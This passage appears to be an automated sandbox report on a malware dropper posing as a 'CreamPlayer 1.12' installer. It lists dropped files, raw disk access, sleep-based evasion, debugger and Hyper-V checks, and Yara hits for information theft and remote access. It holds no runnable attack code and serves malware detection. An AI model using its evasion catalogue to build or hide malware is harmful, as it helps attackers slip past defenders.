Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | File created: C:\ProgramData\SmartImageDrive\SmartImageDrive.exe
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-AG5KU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\LTDIS13n.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-S3M63.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-7JNKK.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-2031L.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\msvcr71.dll (copy)
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | File created: C:\ProgramData\SmartImageDrive\sqlite3.dll
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | File created: C:\ProgramData\SmartImageDrive\SmartImageDrive.exe

Boot Survival

Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 5_2_02D4E898
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_00401724 StartServiceCtrlDispatcherA, 5_2_00401724
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 2_2_00423C0C
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 2_2_00423C0C
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004241DC IsIconic,SetActiveWindow,SetFocus, 2_2_004241DC
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00424194 IsIconic,SetActiveWindow, 2_2_00424194
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 2_2_00418384
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 2_2_0042285C
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00417598 IsIconic,GetCapture, 2_2_00417598
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 2_2_0048393C
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00417CCE IsIconic,SetWindowPos, 2_2_00417CCE
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 2_2_00417CD0
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 2_2_0041F118
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 5_2_02D4E99C
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Window / User API: threadDelayed 3773
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Window / User API: threadDelayed 6154
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\msvcp71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\uninstall\is-9AR6U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\gdiplus.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-FFG28.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\ltkrn13n.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-U5LDH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-5889C.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-AG5KU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\LTDIS13n.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-S3M63.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-7JNKK.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-2031L.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\CreamPlayer 1.12\msvcr71.dll (copy)
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Evasive API call chain: GetSystemTime,DecisionNodes graph_0-5969
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe TID: 7424 | Thread sleep count: 3773 > 30
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe TID: 7424 | Thread sleep time: -7546000s >= -30000s
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe TID: 7772 | Thread sleep time: -1140000s >= -30000s
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe TID: 7424 | Thread sleep count: 6154 > 30
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe TID: 7424 | Thread sleep time: -12308000s >= -30000s
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00452A60 FindFirstFileA,GetLastError, 2_2_00452A60
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00474F88 FindFirstFileA,FindNextFileA,FindClose, 2_2_00474F88
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 2_2_004980A4
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 2_2_00464158
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00462750 FindFirstFileA,FindNextFileA,FindClose, 2_2_00462750
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 2_2_00463CDC
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409B78
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Thread delayed: delay time: 60000
Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034D0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWd~
Source: creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034D0000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000958000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | API call chain: ExitProcess graph end node graph_0-6766
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | API call chain: ExitProcess graph end node graph_5-61087
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep graph_5-61268
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D580F0 IsDebuggerPresent, 5_2_02D580F0
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D5E6AE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 5_2_02D5E6AE
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_004502C0
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D45E4F RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection, 5_2_02D45E4F
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D580DA SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_02D580DA
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 2_2_00478504
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause cream_player_12135
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 2_2_0042E09C
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_02D4E850 cpuid 5_2_02D4E850
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: GetLocaleInfoA, 0_2_0040520C
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: GetLocaleInfoA, 0_2_00405258
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: GetLocaleInfoA, 2_2_00408568
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: GetLocaleInfoA, 2_2_004085B4
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle, 2_2_004585C8
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0045559C GetUserNameA, 2_2_0045559C
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exeCode function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

Stealing of Sensitive Information

Source: Yara match | File source: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2616261521.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: creamplayer_x32.exe PID: 7420, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2616261521.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: creamplayer_x32.exe PID: 7420, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,5_2_609660FA
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,5_2_6090C1D6
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,5_2_60963143
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_6096A2BD
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,5_2_6096923E
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,5_2_6096A38C
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_6096748C
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,5_2_609254B1
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6094B407
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6090F435 sqlite3_bind_parameter_index,5_2_6090F435
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,5_2_609255D4
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_609255FF sqlite3_bind_text,5_2_609255FF
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,5_2_6096A5EE
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,5_2_6094B54C
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,5_2_60925686
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,5_2_6094A6C5
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,5_2_609256E5
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,5_2_6094B6ED
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6092562A sqlite3_bind_blob,5_2_6092562A
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,5_2_60925655
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6094C64A
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_609687A7
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6095F7F7
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,5_2_6092570B
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095F772
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,5_2_60925778
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6090577D sqlite3_bind_parameter_name,5_2_6090577D
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,5_2_6094B764
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6090576B sqlite3_bind_parameter_count,5_2_6090576B
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,5_2_6094A894
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095F883
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,5_2_6094C8C2
